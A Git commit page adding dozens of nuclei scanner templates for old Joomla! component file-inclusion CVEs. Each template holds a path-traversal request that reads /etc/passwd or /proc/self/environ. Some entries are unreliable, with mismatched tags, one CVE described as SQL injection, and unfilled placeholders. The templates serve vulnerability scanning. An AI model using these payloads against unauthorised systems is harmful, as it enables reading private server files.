daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding daffainfo templates

patch-1
daffainfo 2021-09-27 18:02:48 +07:00
parent ac8c9379e9
commit 60ebe64497
65 changed files with 1775 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
cves/2007/CVE-2007-4504.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference: |
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=..|index.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-4764.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: |
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6080.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference: |
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6222.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-1496.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-2015.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference: |
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-2100.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section= [-LFI-]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-3053.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference: |
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=[-LFI-]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-3318.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=/../.."
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-4202.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=[-LFI-]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-4679.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=[-LFI-]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0157.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference: |
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=[-LFI-]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0467.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0696.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference: |
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0759.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference: |
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0942.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0972.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0982.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=[-LFI-]"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1056.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1081.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1217.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE: the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference: |
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view={LFI}%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1302.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller={lfi}%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1340.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1461.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1469.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1478.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1478
info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1491.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1491
info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1540.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1603.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1603
info:
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12284
- https://www.cvedetails.com/cve/CVE-2010-1603
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1653.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1653
info:
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
reference: |
- https://www.exploit-db.com/exploits/12430
- https://www.cvedetails.com/cve/CVE-2010-1653
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1658.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1715.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
reference: |
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1873.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1873
info:
name: Joomla! Component Jvehicles - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information.
reference: |
- https://www.exploit-db.com/exploits/11997
- https://www.cvedetails.com/cve/CVE-2010-1873
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1878.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1878
info:
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12317
- https://www.cvedetails.com/cve/CVE-2010-1878
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1957.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1957
info:
name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12235
- https://www.cvedetails.com/cve/CVE-2010-1957
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1977.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1977
info:
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12083
- https://www.cvedetails.com/cve/CVE-2010-1977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1982.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1982
info:
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12121
- https://www.cvedetails.com/cve/CVE-2010-1982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2045.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2045
info:
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12595
- https://www.cvedetails.com/cve/CVE-2010-2045
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=[LFI]%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2050.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12611
- https://www.cvedetails.com/cve/CVE-2010-2050
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2128.yml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2128
info:
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12607
- https://www.cvedetails.com/cve/CVE-2010-2128
tags: cve,cve2010,joomla,lfi
requests:
